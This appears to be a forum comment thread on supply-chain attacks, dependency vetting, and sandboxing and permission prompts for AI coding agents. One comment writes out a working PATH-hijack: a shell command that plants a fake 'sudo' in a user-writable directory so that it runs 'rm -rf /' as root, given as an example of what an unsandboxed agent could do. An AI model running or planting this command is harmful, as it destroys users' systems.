And nothing big has happened despite all the risks and problems that came up with it. People keep chasing speed and convenience, because most things don’t even last long enough to ever see a problem.
A number of these supply chain compromises had incredibly high stakes and were seemingly noticed before paying off only by lucky coincidence.
The fun part is, there have been a lot of non-misses! Like, a lot! Tons of data have been exfiltrated, plenty of successful attacks, etc. In the end... it just didn't matter.
Your analogy isn't really apt either. My argument is closer to "given that, in the past decade-plus, nothing of worth has been harmed, should we require airbags and seatbelts for everything?". Obviously in some extreme mission-critical systems you should be much smarter. But in 99% of cases it doesn't matter.
By now, getting a car without airbags would probably be more costly, if it's even possible, and the seatbelt takes 2s every time you're in a car, which is not nothing but is still very little. In comparison, analyzing all the dependencies of a software project, vetting them individually, or having fewer of them can require days of effort at a huge cost.
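For a sense of scale (a rough sketch; this assumes a Python environment, and other ecosystems have equivalents like `npm ls --all` or `cargo tree`), merely enumerating what you'd have to vet is a one-liner, while actually reading each package is the part that takes days:

```shell
# Count every installed Python distribution a project could be pulling in;
# each line of output is one package somebody would have to vet by hand
python3 -m pip list --format=freeze | wc -l
```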
We all want as much security as possible until there's an actual cost to be paid, it's a tradeoff like everything else.
These are generally (but not always) 2 different sets of people.
Industry caught on quick though.
Unreliable, unpredictable AI agents (and their parent companies) with system-wide permissions are a new kind of threat IMO.
I think the actual data flow here is really hard to grasp for many users. Sandboxing helps limit the blast radius of the agent itself, but from a data privacy perspective the agent is best visualized as living in the cloud and remote-operating your computer/sandbox, not as an entity that can be "jailed" and thus "prevented from running off with your data".
The inference provider gets the data the instant the agent looks at it to consider its next steps, even if the next step is to do nothing with it because it contains highly sensitive information.
/rant
If you do use a sandbox, be prepared to endlessly click "Approve" as the tool struggles to install python packages to the right location.
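One way to cut down on that prompt churn (a sketch, assuming a Python project and a sandbox that already allows writes inside the project directory) is to keep installs in a project-local virtual environment instead of letting the tool guess at a system location:

```shell
# Create a virtualenv inside the project; the sandbox already permits
# writes here, so package installs stop tripping approval prompts
python3 -m venv .venv

# Use the venv's own pip so nothing lands in a system-wide location
./.venv/bin/pip --version
```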
echo -e '#!/bin/sh\n/usr/bin/sudo rm -rf /\nexec /usr/bin/sudo "$@"' > ~/.local/bin/sudo
chmod +x ~/.local/bin/sudo
Especially since $PATH often includes user-writable directories.

It was installing packages somewhere and then complaining that it could not access them in the sandbox.
I did not look into what exactly the issue was, but clearly the process wasn't working as smoothly as it should. My "project" contained only PDF files and no Codex customizations; this was on Windows.
A real sandbox doesn't even give the software inside an option to extend it. You build the sandbox knowing exactly what you need because you understand what you're doing, being a software developer and all.
And I imagine it's going to be the same for most developers out there, thus the "ask for permission" model.
That model seems to work quite well for millions of developers.
As we just discussed, obviously you are likely to need internet access at some point.
The agent can decide whether it believes it needs to go outside of the sandbox and trigger a prompt.
This way you could have it sandboxed most of the time, but still allow access outside of the sandbox when you know the operation requires it.
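A minimal sketch of that prompt flow (hypothetical names; a real agent harness would hook this into its tool-call layer) is just an allowlist check with a manual fallback:

```shell
# Hypothetical approval gate: allowlisted commands run sandboxed without
# asking; anything else triggers a y/N prompt before leaving the sandbox
allow_outside_sandbox() {
    case " ls cat grep " in
        *" $1 "*) echo "sandboxed: $1"; return 0 ;;
    esac
    printf 'Allow %s outside the sandbox? [y/N] ' "$1" >&2
    read -r answer
    if [ "$answer" = "y" ]; then
        echo "approved: $1"
    else
        echo "denied: $1"
        return 1
    fi
}
```

For example, `echo y | allow_outside_sandbox curl` approves a network call, while `allow_outside_sandbox ls` runs without ever prompting.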
I have noticed it's become one of my most searched posts on Google though. Something like ten clicks a month! So at least some people aren't stupid.
Nice article.
We've seen an increase in hijacked packages installing malware. Folks generally expect well known software to be safe to install. I trust that the claude code harness is safe and I'm reviewing all of the non-trivial commands it's running. So I think my claude usage is actually safer than my AUR installs.
Granted, if you're bypassing permissions and running dangerously, then... yea, you are basically just giving a keyboard to an idiot savant with the tendency to hallucinate.
Only a matter of time before this type of access becomes productized.